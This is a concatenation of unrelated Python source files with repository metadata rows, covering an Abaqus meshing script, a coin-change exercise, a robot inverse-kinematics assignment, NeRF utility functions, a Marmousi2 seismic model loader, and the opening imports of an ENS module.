# Create set with surface
select_bot_surf=a_surf_bot.surfaces['rigid_support']
# Perhaps we need to define a set instead of a face
#AnalyticSurf_surface=a_surf_bot.Surface(side1Faces=select_bot_surf, name='support_surf_bot-1')
mdb.models['Model-1'].RigidBody(name='Constraint-RigidBody_surf_bot-1', refPointRegion=refpoint_ZmYmXm,
surfaceRegion=select_bot_surf)
for iVertex in range(0,VertexPolygon,1):
#
# Select appropriate coordinate system:
DatumID = LocalDatum_list[iVertex].id
datum = a_long.datums[DatumID]
for iStorey in range(0,nStories+1,1):
# Current joint:
current_joint_name = 'joint-'+str(iStorey)+'-'+str(iVertex)
# Define COUPLING constraints for all the joints:
if iStorey == 0: # Bottom base:
#
master_region=a.sets['RP_ZmYmXm'] # Note that the master is the Reference Point
#
slave_region=a_long.sets[current_joint_name]
# Make constraint for this joint:
Constraint_name = 'RP_ZmYmXm_PinConstraint-'+str(iStorey)+'-'+str(iVertex)
mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=OFF, ur2=ON, ur3=ON)
#
#Constraint_name = 'RP_ZmYmXm_FixedConstraint-'+str(iStorey)+'-'+str(iVertex)
#mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
# surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
# localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=ON, ur2=ON, ur3=ON)
# Make constraint for this joint:
elif iStorey == nStories: # Top base:
#
master_region=a.sets['RP_ZpYmXm'] # Note that the master is the Reference Point
#
slave_region=a_long.sets[current_joint_name]
# Make constraint for this joint:
Constraint_name = 'RP_ZpYmXm_PinConstraint-'+str(iStorey)+'-'+str(iVertex)
mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=OFF, ur2=ON, ur3=ON)
#
#Constraint_name = 'RP_ZpYmXm_FixedConstraint-'+str(iStorey)+'-'+str(iVertex)
#mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
# surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
# localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=ON, ur2=ON, ur3=ON)
# Make constraint for this joint:
else: # Middle stories:
master_region=a_long.sets[current_joint_name]
#
slave_region=a_bat.sets[current_joint_name]
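            # NOTE (added comment): 'a_bat' (a battens instance) is not created in this
            # meshing-only script, so this branch would fail for nStories > 1; with
            # nStories = 1 every storey is either the bottom or the top base and this
            # branch is never reached.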
# Make constraint for this joint:
#endif iStorey
#
#end for iStorey
#end for iVertex
#
# Create hinges:
#select_joints=a.instances['deployable_mast-1'].sets['all_joints_set']
#select_RefPoint=a.sets['RP_joints']
#mdb.models['Model-1'].RigidBody(name='JointsContraint', refPointRegion=select_RefPoint,
# pinRegion=select_joints)
#
# Export mesh to .inp file
#
mdb.Job(name='include_mesh_DoE72', model='Model-1', type=ANALYSIS, explicitPrecision=SINGLE,
nodalOutputPrecision=SINGLE, description='',
parallelizationMethodExplicit=DOMAIN, multiprocessingMode=DEFAULT,
numDomains=1, userSubroutine='', numCpus=1, memory=90,
memoryUnits=PERCENTAGE, scratch='', echoPrint=OFF, modelPrint=OFF,
contactPrint=OFF, historyPrint=OFF)
import os
mdb.jobs['include_mesh_DoE72'].writeInput(consistencyChecking=OFF)
# End of python script
| 44.467018
| 206
| 0.692933
|
1c3bfa42909e72f3da5ec15ede1344602925a55d
| 118
|
py
|
Python
|
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
x = int(input())
l = [1000,500,100,50,20,10,5,1]
for i in range(8):
print(f"{l[i]} => {x//l[i]}")
x = x%l[i]
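# Worked example (added comment): for x = 1234 the greedy breakdown prints
# 1000 => 1, 500 => 0, 100 => 2, 50 => 0, 20 => 1, 10 => 1, 5 => 0, 1 => 4.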
| 16.857143
| 32
| 0.466102
|
1a339db0fc264095507bb7ddeb15a7dd997feacc
| 3,029
|
py
|
Python
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 48
|
2021-11-27T05:28:31.000Z
|
2022-02-06T16:08:30.000Z
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 15
|
2021-03-03T10:50:59.000Z
|
2021-06-21T07:47:47.000Z
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 25
|
2021-03-02T15:08:11.000Z
|
2022-03-29T14:34:20.000Z
|
# """Assignment 03: Using inverse kinematics
# """
import json
import os
from compas_fab.backends import RosClient
from compas_fab.robots import Configuration
from compas.geometry import Frame
from compas.geometry import Point
from compas.geometry import Vector
from compas_fab.utilities import write_data_to_json
# This function defines the inputs of your assignment, you get a compas_fab.robots.Robot and a Frame
# and are expected to return ONE valid configuration to reach that frame
def calculate_ik(robot, frame):
# 1. define a valid start configuration for your frames
start_configuration = robot.zero_configuration()
# 2. use inverse kinematics to find out a valid configuration
configuration = robot.inverse_kinematics(frame, start_configuration)
# print("Found configuration", configuration)
return configuration
def store_configurations(configurations):
# 3. store all found configurations in a JSON file
here = os.path.dirname(__file__)
path = os.path.abspath(os.path.join(here, "json_file.json"))
configuration_json =[]
for configuration in configurations:
configuration_json.append(configuration.data)
write_data_to_json(configuration_json, path)
# pass
# Use the following to test from the command line
# Or copy solution_viewer.ghx next to the folder where you created assignment_03.py to visualize the same in Grasshopper
if __name__ == '__main__':
frame_list = [
Frame(Point(0.084, 0.319, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.152, 0.317, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.220, 0.315, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.288, 0.313, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.357, 0.310, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.425, 0.308, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.493, 0.306, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.561, 0.303, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.629, 0.301, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.698, 0.299, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.766, 0.297, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000))
]
# Loads the robot from ROS
with RosClient('localhost') as client:
robot = client.load_robot()
# And call our assignment functions for each frame in the example
configurations = []
for frame in frame_list:
configuration = calculate_ik(robot, frame)
configurations.append(configuration)
print("Found configuration", configuration)
store_configurations(configurations)
| 48.854839
| 120
| 0.679762
|
59ef87b582c06e01fd47588ae7e4513cdf32250e
| 15,675
|
py
|
Python
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 703
|
2020-12-04T02:41:05.000Z
|
2022-03-31T07:59:50.000Z
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 46
|
2020-12-08T23:00:54.000Z
|
2022-03-26T03:06:07.000Z
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 118
|
2020-12-04T05:37:11.000Z
|
2022-03-28T03:34:50.000Z
|
import cv2
import numpy as np
import torch
from torchvision import transforms
from torch import nn
from torch.nn import init
import torch.nn.functional as F
import functools
import math
import warnings
def image_float_to_uint8(img):
"""
    Rescale a float image by its min/max and convert to uint8 (0-255)
"""
vmin = np.min(img)
vmax = np.max(img)
if vmax - vmin < 1e-10:
vmax += 1e-10
img = (img - vmin) / (vmax - vmin)
img *= 255.0
return img.astype(np.uint8)
def cmap(img, color_map=cv2.COLORMAP_HOT):
"""
Apply 'HOT' color to a float image
"""
return cv2.applyColorMap(image_float_to_uint8(img), color_map)
def batched_index_select_nd(t, inds):
"""
Index select on dim 1 of a n-dimensional batched tensor.
:param t (batch, n, ...)
:param inds (batch, k)
:return (batch, k, ...)
"""
return t.gather(
1, inds[(...,) + (None,) * (len(t.shape) - 2)].expand(-1, -1, *t.shape[2:])
)
def batched_index_select_nd_last(t, inds):
"""
Index select on dim -1 of a >=2D multi-batched tensor. inds assumed
to have all batch dimensions except one data dimension 'n'
:param t (batch..., n, m)
:param inds (batch..., k)
:return (batch..., n, k)
"""
dummy = inds.unsqueeze(-2).expand(*inds.shape[:-1], t.size(-2), inds.size(-1))
out = t.gather(-1, dummy)
return out
def repeat_interleave(input, repeats, dim=0):
"""
Repeat interleave along axis 0
torch.repeat_interleave is currently very slow
https://github.com/pytorch/pytorch/issues/31980
"""
output = input.unsqueeze(1).expand(-1, repeats, *input.shape[1:])
return output.reshape(-1, *input.shape[1:])
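# Added note: e.g. an input of shape (2, C) with repeats=3 becomes shape (6, C),
# ordered as [x0, x0, x0, x1, x1, x1] (each row repeated consecutively).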
def get_image_to_tensor_balanced(image_size=0):
ops = []
if image_size > 0:
ops.append(transforms.Resize(image_size))
ops.extend(
[transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),]
)
return transforms.Compose(ops)
def get_mask_to_tensor():
return transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.0,), (1.0,))]
)
def homogeneous(points):
"""
Concat 1 to each point
:param points (..., 3)
:return (..., 4)
"""
return F.pad(points, (0, 1), "constant", 1.0)
def gen_grid(*args, ij_indexing=False):
"""
    Generate len(args)-dimensional grid.
Each arg should be (lo, hi, sz) so that in that dimension points
are taken at linspace(lo, hi, sz).
Example: gen_grid((0,1,10), (-1,1,20))
:return (prod_i args_i[2], len(args)), len(args)-dimensional grid points
"""
return torch.from_numpy(
np.vstack(
np.meshgrid(
*(np.linspace(lo, hi, sz, dtype=np.float32) for lo, hi, sz in args),
indexing="ij" if ij_indexing else "xy"
)
)
.reshape(len(args), -1)
.T
)
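# Added note: e.g. gen_grid((0, 1, 10), (-1, 1, 20)) returns a (200, 2) tensor of
# grid points, since 10 * 20 = 200 points in 2 dimensions.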
def unproj_map(width, height, f, c=None, device="cpu"):
"""
Get camera unprojection map for given image size.
[y,x] of output tensor will contain unit vector of camera ray of that pixel.
:param width image width
:param height image height
:param f focal length, either a number or tensor [fx, fy]
    :param c principal point, optional, either None or tensor [cx, cy]
if not specified uses center of image
:return unproj map (height, width, 3)
"""
if c is None:
c = [width * 0.5, height * 0.5]
else:
c = c.squeeze()
if isinstance(f, float):
f = [f, f]
elif len(f.shape) == 0:
f = f[None].expand(2)
elif len(f.shape) == 1:
f = f.expand(2)
Y, X = torch.meshgrid(
torch.arange(height, dtype=torch.float32) - float(c[1]),
torch.arange(width, dtype=torch.float32) - float(c[0]),
)
X = X.to(device=device) / float(f[0])
Y = Y.to(device=device) / float(f[1])
Z = torch.ones_like(X)
unproj = torch.stack((X, -Y, -Z), dim=-1)
unproj /= torch.norm(unproj, dim=-1).unsqueeze(-1)
return unproj
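# Added note: e.g. unproj_map(4, 3, 100.0) returns a (3, 4, 3) tensor; each [y, x]
# entry is a unit-length ray direction with negative z component (the camera
# looks down the -z axis).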
def coord_from_blender(dtype=torch.float32, device="cpu"):
"""
Blender to standard coordinate system transform.
Standard coordinate system is: x right y up z out (out=screen to face)
Blender coordinate system is: x right y in z up
:return (4, 4)
"""
return torch.tensor(
[[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]],
dtype=dtype,
device=device,
)
def coord_to_blender(dtype=torch.float32, device="cpu"):
"""
Standard to Blender coordinate system transform.
Standard coordinate system is: x right y up z out (out=screen to face)
Blender coordinate system is: x right y in z up
:return (4, 4)
"""
return torch.tensor(
[[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]],
dtype=dtype,
device=device,
)
def look_at(origin, target, world_up=np.array([0, 1, 0], dtype=np.float32)):
"""
Get 4x4 camera to world space matrix, for camera looking at target
"""
back = origin - target
back /= np.linalg.norm(back)
right = np.cross(world_up, back)
right /= np.linalg.norm(right)
up = np.cross(back, right)
cam_to_world = np.empty((4, 4), dtype=np.float32)
cam_to_world[:3, 0] = right
cam_to_world[:3, 1] = up
cam_to_world[:3, 2] = back
cam_to_world[:3, 3] = origin
cam_to_world[3, :] = [0, 0, 0, 1]
return cam_to_world
def get_cuda(gpu_id):
"""
Get a torch.device for GPU gpu_id. If GPU not available,
returns CPU device.
"""
return (
torch.device("cuda:%d" % gpu_id)
if torch.cuda.is_available()
else torch.device("cpu")
)
def masked_sample(masks, num_pix, prop_inside, thresh=0.5):
"""
:return (num_pix, 3)
"""
num_inside = int(num_pix * prop_inside + 0.5)
num_outside = num_pix - num_inside
inside = (masks >= thresh).nonzero(as_tuple=False)
outside = (masks < thresh).nonzero(as_tuple=False)
pix_inside = inside[torch.randint(0, inside.shape[0], (num_inside,))]
pix_outside = outside[torch.randint(0, outside.shape[0], (num_outside,))]
pix = torch.cat((pix_inside, pix_outside))
return pix
def bbox_sample(bboxes, num_pix):
"""
:return (num_pix, 3)
"""
image_ids = torch.randint(0, bboxes.shape[0], (num_pix,))
pix_bboxes = bboxes[image_ids]
x = (
torch.rand(num_pix) * (pix_bboxes[:, 2] + 1 - pix_bboxes[:, 0])
+ pix_bboxes[:, 0]
).long()
y = (
torch.rand(num_pix) * (pix_bboxes[:, 3] + 1 - pix_bboxes[:, 1])
+ pix_bboxes[:, 1]
).long()
pix = torch.stack((image_ids, y, x), dim=-1)
return pix
def gen_rays(poses, width, height, focal, z_near, z_far, c=None, ndc=False):
"""
Generate camera rays
:return (B, H, W, 8)
"""
num_images = poses.shape[0]
device = poses.device
cam_unproj_map = (
unproj_map(width, height, focal.squeeze(), c=c, device=device)
.unsqueeze(0)
.repeat(num_images, 1, 1, 1)
)
cam_centers = poses[:, None, None, :3, 3].expand(-1, height, width, -1)
cam_raydir = torch.matmul(
poses[:, None, None, :3, :3], cam_unproj_map.unsqueeze(-1)
)[:, :, :, :, 0]
if ndc:
if not (z_near == 0 and z_far == 1):
warnings.warn(
"dataset z near and z_far not compatible with NDC, setting them to 0, 1 NOW"
)
z_near, z_far = 0.0, 1.0
cam_centers, cam_raydir = ndc_rays(
width, height, focal, 1.0, cam_centers, cam_raydir
)
cam_nears = (
torch.tensor(z_near, device=device)
.view(1, 1, 1, 1)
.expand(num_images, height, width, -1)
)
cam_fars = (
torch.tensor(z_far, device=device)
.view(1, 1, 1, 1)
.expand(num_images, height, width, -1)
)
return torch.cat(
(cam_centers, cam_raydir, cam_nears, cam_fars), dim=-1
) # (B, H, W, 8)
def trans_t(t):
return torch.tensor(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, t], [0, 0, 0, 1],], dtype=torch.float32,
)
def rot_phi(phi):
return torch.tensor(
[
[1, 0, 0, 0],
[0, np.cos(phi), -np.sin(phi), 0],
[0, np.sin(phi), np.cos(phi), 0],
[0, 0, 0, 1],
],
dtype=torch.float32,
)
def rot_theta(th):
return torch.tensor(
[
[np.cos(th), 0, -np.sin(th), 0],
[0, 1, 0, 0],
[np.sin(th), 0, np.cos(th), 0],
[0, 0, 0, 1],
],
dtype=torch.float32,
)
def pose_spherical(theta, phi, radius):
"""
Spherical rendering poses, from NeRF
"""
c2w = trans_t(radius)
c2w = rot_phi(phi / 180.0 * np.pi) @ c2w
c2w = rot_theta(theta / 180.0 * np.pi) @ c2w
c2w = (
torch.tensor(
[[-1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]],
dtype=torch.float32,
)
@ c2w
)
return c2w
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def get_norm_layer(norm_type="instance", group_norm_groups=32):
"""Return a normalization layer
Parameters:
        norm_type (str) -- the name of the normalization layer: batch | instance | group | none
For BatchNorm, we use learnable affine parameters and track running statistics (mean/stddev).
For InstanceNorm, we do not use learnable affine parameters. We do not track running statistics.
"""
if norm_type == "batch":
norm_layer = functools.partial(
nn.BatchNorm2d, affine=True, track_running_stats=True
)
elif norm_type == "instance":
norm_layer = functools.partial(
nn.InstanceNorm2d, affine=False, track_running_stats=False
)
elif norm_type == "group":
norm_layer = functools.partial(nn.GroupNorm, group_norm_groups)
elif norm_type == "none":
norm_layer = None
else:
raise NotImplementedError("normalization layer [%s] is not found" % norm_type)
return norm_layer
def make_conv_2d(
dim_in,
dim_out,
padding_type="reflect",
norm_layer=None,
activation=None,
kernel_size=3,
use_bias=False,
stride=1,
no_pad=False,
zero_init=False,
):
conv_block = []
amt = kernel_size // 2
if stride > 1 and not no_pad:
raise NotImplementedError(
"Padding with stride > 1 not supported, use same_pad_conv2d"
)
if amt > 0 and not no_pad:
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(amt)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(amt)]
elif padding_type == "zero":
conv_block += [nn.ZeroPad2d(amt)]
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block.append(
nn.Conv2d(
dim_in, dim_out, kernel_size=kernel_size, bias=use_bias, stride=stride
)
)
if zero_init:
nn.init.zeros_(conv_block[-1].weight)
# else:
# nn.init.kaiming_normal_(conv_block[-1].weight)
if norm_layer is not None:
conv_block.append(norm_layer(dim_out))
if activation is not None:
conv_block.append(activation)
return nn.Sequential(*conv_block)
def calc_same_pad_conv2d(t_shape, kernel_size=3, stride=1):
in_height, in_width = t_shape[-2:]
out_height = math.ceil(in_height / stride)
out_width = math.ceil(in_width / stride)
pad_along_height = max((out_height - 1) * stride + kernel_size - in_height, 0)
pad_along_width = max((out_width - 1) * stride + kernel_size - in_width, 0)
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
return pad_left, pad_right, pad_top, pad_bottom
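# Added note: e.g. for a (..., 5, 5) input with kernel_size=3, stride=1 this
# returns (1, 1, 1, 1), i.e. one pixel of padding on every side so the output
# stays 5x5.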
def same_pad_conv2d(t, padding_type="reflect", kernel_size=3, stride=1, layer=None):
"""
Perform SAME padding on tensor, given kernel size/stride of conv operator
assumes kernel/stride are equal in all dimensions.
Use before conv called.
Dilation not supported.
:param t image tensor input (B, C, H, W)
:param padding_type padding type constant | reflect | replicate | circular
constant is 0-pad.
:param kernel_size kernel size of conv
:param stride stride of conv
:param layer optionally, pass conv layer to automatically get kernel_size and stride
(overrides these)
"""
if layer is not None:
if isinstance(layer, nn.Sequential):
layer = next(layer.children())
kernel_size = layer.kernel_size[0]
stride = layer.stride[0]
return F.pad(
t, calc_same_pad_conv2d(t.shape, kernel_size, stride), mode=padding_type
)
def same_unpad_deconv2d(t, kernel_size=3, stride=1, layer=None):
"""
Perform SAME unpad on tensor, given kernel/stride of deconv operator.
Use after deconv called.
Dilation not supported.
"""
if layer is not None:
if isinstance(layer, nn.Sequential):
layer = next(layer.children())
kernel_size = layer.kernel_size[0]
stride = layer.stride[0]
h_scaled = (t.shape[-2] - 1) * stride
w_scaled = (t.shape[-1] - 1) * stride
pad_left, pad_right, pad_top, pad_bottom = calc_same_pad_conv2d(
(h_scaled, w_scaled), kernel_size, stride
)
if pad_right == 0:
pad_right = -10000
if pad_bottom == 0:
pad_bottom = -10000
return t[..., pad_top:-pad_bottom, pad_left:-pad_right]
def combine_interleaved(t, inner_dims=(1,), agg_type="average"):
if len(inner_dims) == 1 and inner_dims[0] == 1:
return t
t = t.reshape(-1, *inner_dims, *t.shape[1:])
if agg_type == "average":
t = torch.mean(t, dim=1)
elif agg_type == "max":
t = torch.max(t, dim=1)[0]
else:
raise NotImplementedError("Unsupported combine type " + agg_type)
return t
def psnr(pred, target):
"""
Compute PSNR of two tensors in decibels.
pred/target should be of same size or broadcastable
"""
mse = ((pred - target) ** 2).mean()
psnr = -10 * math.log10(mse)
return psnr
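# Added note: this assumes the signal peak is 1.0 (images scaled to [0, 1]);
# e.g. an MSE of 0.01 gives -10 * log10(0.01) = 20 dB.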
def quat_to_rot(q):
"""
Quaternion to rotation matrix
"""
batch_size, _ = q.shape
q = F.normalize(q, dim=1)
R = torch.ones((batch_size, 3, 3), device=q.device)
qr = q[:, 0]
qi = q[:, 1]
qj = q[:, 2]
qk = q[:, 3]
R[:, 0, 0] = 1 - 2 * (qj ** 2 + qk ** 2)
R[:, 0, 1] = 2 * (qj * qi - qk * qr)
R[:, 0, 2] = 2 * (qi * qk + qr * qj)
R[:, 1, 0] = 2 * (qj * qi + qk * qr)
R[:, 1, 1] = 1 - 2 * (qi ** 2 + qk ** 2)
R[:, 1, 2] = 2 * (qj * qk - qi * qr)
R[:, 2, 0] = 2 * (qk * qi - qj * qr)
R[:, 2, 1] = 2 * (qj * qk + qi * qr)
R[:, 2, 2] = 1 - 2 * (qi ** 2 + qj ** 2)
return R
def rot_to_quat(R):
"""
Rotation matrix to quaternion
"""
batch_size, _, _ = R.shape
q = torch.ones((batch_size, 4), device=R.device)
R00 = R[:, 0, 0]
R01 = R[:, 0, 1]
R02 = R[:, 0, 2]
R10 = R[:, 1, 0]
R11 = R[:, 1, 1]
R12 = R[:, 1, 2]
R20 = R[:, 2, 0]
R21 = R[:, 2, 1]
R22 = R[:, 2, 2]
q[:, 0] = torch.sqrt(1.0 + R00 + R11 + R22) / 2
q[:, 1] = (R21 - R12) / (4 * q[:, 0])
q[:, 2] = (R02 - R20) / (4 * q[:, 0])
q[:, 3] = (R10 - R01) / (4 * q[:, 0])
return q
def get_module(net):
"""
Shorthand for either net.module (if net is instance of DataParallel) or net
"""
if isinstance(net, torch.nn.DataParallel):
return net.module
else:
return net
| 29.081633
| 100
| 0.583349
|
f8c72f5c3e8213dd831b99c6d1d8d2bf2995f7a8
| 4,070
|
py
|
Python
|
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | 1
|
2021-01-12T11:43:31.000Z
|
2021-01-12T11:43:31.000Z
|
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | null | null | null |
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | null | null | null |
import os
import shutil
import requests
from tqdm import tqdm
from obspy.io.segy.core import _read_segy
import numpy as np
import matplotlib.pyplot as plt
def get_marmousi2_data_location():
# download link and friends
SOURCE_URL = "https://s3.amazonaws.com/open.source.geoscience/open_data/elastic-marmousi/elastic-marmousi-model.tar.gz"
PACKED_FILE_NAME = SOURCE_URL.split('/')[-1]
FOLDER_NAME = PACKED_FILE_NAME.split('.')[0]
# model files names (we know them from MARMOUSI2 spec)
DENSITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_DENSITY_1.25m.segy")
P_WAVE_VELOCITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_P-WAVE_VELOCITY_1.25m.segy")
S_WAVE_VELOCITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_S-WAVE_VELOCITY_1.25m.segy")
return (SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE)
def get_marmousi2_model_params():
# space steps, in meters (we know them from MARMOUSI2 spec)
DX = 1.25
DZ = 1.25
# number of space steps
NUM_X = 13601
NUM_Z = 2801
return (DX, DZ, NUM_X, NUM_Z)
def download(url: str, fname: str):
resp = requests.get(url, stream=True)
total = int(resp.headers.get('content-length', 0))
with open(fname, 'wb') as file, tqdm(
desc=fname,
total=total,
unit='iB',
unit_scale=True,
unit_divisor=1024,
) as bar:
for data in resp.iter_content(chunk_size=1024):
size = file.write(data)
bar.update(size)
def get_and_unpack_data():
print("Local data not found! We are going to prepare it. Please, be patient, it will take some time.")
(SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE) = get_marmousi2_data_location()
print("Downloading elastic marmousi model")
download(SOURCE_URL, PACKED_FILE_NAME)
print("Unpacking elastic marmousi model")
shutil.unpack_archive(PACKED_FILE_NAME)
for f in [DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE]:
shutil.unpack_archive(f + ".tar.gz", os.path.split(f)[0])
print("Done")
def read_data(start_z = 0.0, stop_z = 3500.0, start_x = 0.0, stop_x = 17000.0, coarse_factor = 1):
(SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE) \
= get_marmousi2_data_location()
if not os.path.exists(FOLDER_NAME):
get_and_unpack_data()
(DX, DZ, NUM_X, NUM_Z) = get_marmousi2_model_params()
rho_coeffs = np.zeros((NUM_Z, NUM_X))
cp_coeffs = np.zeros((NUM_Z, NUM_X))
cs_coeffs = np.zeros((NUM_Z, NUM_X))
start_x_ind = int(start_x / DX)
stop_x_ind = 1 + int(stop_x / DX)
start_z_ind = int(start_z / DZ)
stop_z_ind = 1 + int(stop_z / DZ)
    targets = [rho_coeffs, cp_coeffs, cs_coeffs]
    for q, f in enumerate([DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE]):
        print("Reading", f)
        segy = _read_segy(f)
        for i, tr in enumerate(segy.traces):
            targets[q][:, i] = tr.data
    # clip, coarsen, and reverse the Z-axis
rho_coeffs = rho_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
cp_coeffs = cp_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
cs_coeffs = cs_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
rho_coeffs *= 1000
mu_coeffs = rho_coeffs * np.square(cs_coeffs)
la_coeffs = rho_coeffs * (np.square(cp_coeffs) - 2 * np.square(cs_coeffs))
return (rho_coeffs, cp_coeffs, cs_coeffs, la_coeffs, mu_coeffs)
def show(data, title, start_z = 0.0, stop_z = 3500.0, start_x = 0.0, stop_x = 17000.0):
nz, nx = data.shape
fig, ax = plt.subplots()
ax.set_aspect('equal')
im = ax.pcolormesh(np.linspace(start_x, stop_x, nx), np.linspace(-stop_z, -start_z, nz), data)
fig.colorbar(im, ax=ax, orientation='horizontal')
ax.set_title(title)
fig.tight_layout()
plt.show()
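# --- Hedged usage sketch (added illustration, not part of the original file) ---
# Reads a coarsened sub-window of the Marmousi2 model and plots the P-wave
# velocity field; the window bounds and coarse_factor below are example values.
def _marmousi2_usage_sketch():
    rho, cp, cs, la, mu = read_data(start_z=0.0, stop_z=3500.0,
                                    start_x=0.0, stop_x=17000.0,
                                    coarse_factor=4)
    show(cp, "P-wave velocity, m/s")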
| 33.089431
| 137
| 0.692875
|
e214512d5be19e5e29ce15b38dd48ea538abb606
| 14,381
|
py
|
Python
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 3,041
|
2017-11-22T16:23:46.000Z
|
2022-03-31T15:19:39.000Z
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 1,506
|
2017-11-22T15:44:34.000Z
|
2022-03-31T18:40:05.000Z
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 1,095
|
2017-11-22T18:20:22.000Z
|
2022-03-31T13:05:31.000Z
|
from functools import (
wraps,
)
from typing import (
TYPE_CHECKING,
Optional,
Sequence,
Tuple,
Union,
cast,
)
from eth_typing import (
Address,
ChecksumAddress,
HexAddress,
)
from eth_utils import (
is_binary_address,
is_checksum_address,
to_checksum_address,
)
from hexbytes import (
HexBytes,
)
from ens import abis
from ens.constants import (
EMPTY_ADDR_HEX,
ENS_MAINNET_ADDR,
REVERSE_REGISTRAR_DOMAIN,
)
from ens.exceptions import (
AddressMismatch,
UnauthorizedError,
UnownedName,
)
from ens.utils import (
address_in,
address_to_reverse_domain,
default,
dict_copy,
init_web3,
is_none_or_zero_address,
